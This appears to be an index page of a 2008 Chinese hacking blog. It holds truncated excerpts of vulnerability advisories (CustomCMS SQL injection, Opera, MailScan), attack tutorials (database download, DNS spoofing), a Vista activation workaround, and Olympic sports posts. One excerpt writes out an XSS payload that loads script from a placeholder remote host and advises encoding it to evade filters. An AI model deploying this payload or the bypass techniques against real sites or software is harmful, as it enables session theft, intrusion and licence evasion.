• 2008-08-26

    CustomCMS CCMS Gaming 'print.php' SQL注入漏洞 - [exp'or'0day]

    CustomCMS CCMS Gaming是一款基于PHP的WEB应用程序。
    CustomCMS CCMS Gaming不正确过滤用户提交的输入,远程攻击者可以利用漏洞进行SQL注入攻击,获得敏感信息或操作数据库。
    问题是'print.php'脚本对用户提交的'id'参数缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。

     

     

    http://www.e...
    Tag:
    3exxp-0day 发表于07:51:28 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-26

    Opera Web浏览器9.52版本修复多个安全漏洞 - [安全资讯]

    BUGTRAQ ID: 30768

    Opera是一款流行的WEB浏览器,支持多种平台。

    Opera的9.52之前版本中存在多个安全漏洞,可能允许恶意用户执行欺骗和跨站脚本、泄露敏感信息或完全入侵用户系统。

    1) 当Opera作为协议处理器执行时存在错误,可能导致崩溃或执行任意代码。这个漏洞仅影响Windows平台上的Opera。

    2) 网页可以更改弹出窗口中打开的其他站点帧的地址,这可能导致向可信任站点帧中加载恶...
    Tag:
    3exxp-0day 发表于07:50:57 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-24

    对23日跳水的评价 - [本人小记]

    昨天晚上兴致勃勃的去看跳水。

    本想。中国靠这一跳。拿到8块金牌。包揽全部。

    谁知道周吕鑫最后时刻失误 跳水队八金梦碎

    在领先32分的情况下。 输了。

    这让我们感到很大的遗憾。

    刚刚查了下对他的评价。

    都是骂他的。却没有鼓励他的。

    我对那帮人极其的鄙视。

    当你的能站在世界的竞技场最高顶的时候你才有资格骂他,
    ...
    Tag:
    3exxp-0day 发表于07:14:29 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-23

    Vista不激活也能运行至少一年 - [网络攻防]

    Vista又爆新漏洞,用户只须修改注册表中的一个键值,就可以获得额外使用8次slmgr -rearm(延长激活前使用天数30天),再加上原来的3次rearm和最开始的30天,实际上vista可以免激活运行30*(1+3+8)=360天,整整一年!   M$已经把这个方法叫做一个"hack"。该文章也指出,这个漏洞M$很容易封掉,wga只须一个更新即可抓住所有使用此漏洞的电脑,问题是M$去不去做而已。

      以下是如何使用此延时大法:

      ...
    Tag:Vista不激活
    3exxp-0day 发表于08:36:03 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-23

    利用下载漏洞对数据库发起网络上的攻击 - [网络攻防]

    作为脚本漏洞的头号杀手锏——数据库下载漏洞,现在已经被越来越多的人所熟知。在这个信息化技术更新飞快的时代,漏洞产生后随之而来的就是各种应对的招数,比如改数据库的后缀、修改数据库的名字等等。很多人以为只要这么做就可以解决问题了,但事实往往不如你我所愿,即使你这么做了也难逃被高手攻击的命运。为此我们有必要去了解一些攻击的手法,来增强自己的安全技能。
      1.强制下载后缀名为asp、asa的数据库文件   大多数的网管为了节省时间,网站上的文章系统、论坛等程序都是直接下...
    Tag:下载漏洞
    3exxp-0day 发表于08:35:21 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-22

    罗伯斯,看把你牛的!

    昨天晚上没有了刘翔的参加.果然感觉不一般.没有了往日的刺激.

    我们大家把目光都伸象了.打破刘翔记录的萝卜丝[罗伯斯]

    刚开始解说员一一介绍队员的时候. 就看他超级装.. 当然.

    刘翔退赛后,古巴名将罗伯斯毫无疑问拿下了110米栏的金牌。

    看看他超“牛”的表情,没有了刘翔的赛场仿佛成了他一个人的舞台。

    在没有刘翔的比赛. 他放松下.装b下也不是不可以.
    ...
    Tag:罗伯斯vs刘翔 2012年
    3exxp-0day 发表于06:59:06 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-22

    豪华版明星大合唱献演闭幕式 周董也将现身

    以感情色彩为主友谊为重 熄火环节将是最大亮点

     

    与开幕式承载太多含义,预留太多悬念不同,奥运会的闭幕式总是为观众和运动员营造一个轻松的环境,让经历了紧张比赛的运动员们放松放松,更像是一个奥林匹克大家庭的大聚会,那么北京奥运会的闭幕式会如何来表现这个大聚会?

     

    在一个气势磅礴的奥运会开幕式之后,开幕式演职人员早已马不停蹄全部投入闭幕式的准备中。奥运会闭幕式设计师主任苗培如说,与开幕式不同,闭...
    Tag:闭幕式 周董
    3exxp-0day 发表于06:57:47 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-21

    MailScan Web管理接口多个安全漏洞 - [安全资讯]

    MailScan是先进的邮件服务器实时杀毒和反垃圾邮件解决方案。

    MailScan提供了基于Web的管理功能,管理控制台(Server.exe)是以LocalSystem权限运行在TCP 10443端口上的HTTP服务。该服务存在多个输入验证错误,允许恶意攻击者泄露敏感信息、执行跨站脚本或绕过某些安全限制。

    1) 远程攻击者可以向Web管理接口发送特制请求执行目录遍历攻击,下载任意文件。

    2) Web管理接口没有正确地限制对某些页面...
    Tag:
    3exxp-0day 发表于07:02:38 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-20

    DNS欺骗技术教程 - [网络攻防]

    定义: DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。

    原理:如果可以冒充域名服务器,然后把查询的IP地址设为攻击者的IP地址,这样的话,用户上网就只能看到攻击者的主页,而不是用户想要取得的网站的主页了,这就是DNS欺骗的基本原理。DNS欺骗其实并不是真的“黑掉”了对方的网站,而是冒名顶替、招摇撞骗罢了。

    现在的Internet上存在的DNS服务器有绝大多数都是用bind来架设的,使用的bind版本主要为bind 4.9.5+P...
    Tag:DNS欺骗技术教程
    3exxp-0day 发表于07:43:09 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-20

    XSS中再插JS - [网络攻防]

    <img src="javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}"></img>

    字符过滤怎么办?用Encode加密后就无敌了~

    未加密前:
    <img src='#' XSS="try{var ...
    Tag:
    3exxp-0day 发表于07:42:36 | 阅读全文 | 评论 0 | 编辑 | 分享 0
共33页 第一页 上一页 1 2 3 4 5 6 7 8 9 10 下一页 最后一页